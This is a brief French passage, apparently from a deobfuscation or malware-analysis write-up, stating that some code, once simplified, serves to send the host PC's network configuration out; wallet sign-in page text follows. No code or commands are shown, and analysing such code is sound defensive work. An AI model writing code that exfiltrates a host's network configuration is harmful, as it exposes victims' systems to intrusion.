Le code est maintenant beaucoup plus lisible et simplifier. On comprend donc que sont utilisation est de faire sortir la configuration reseaux du PC de l'hote.
Sign in with Wallet
Connect another wallet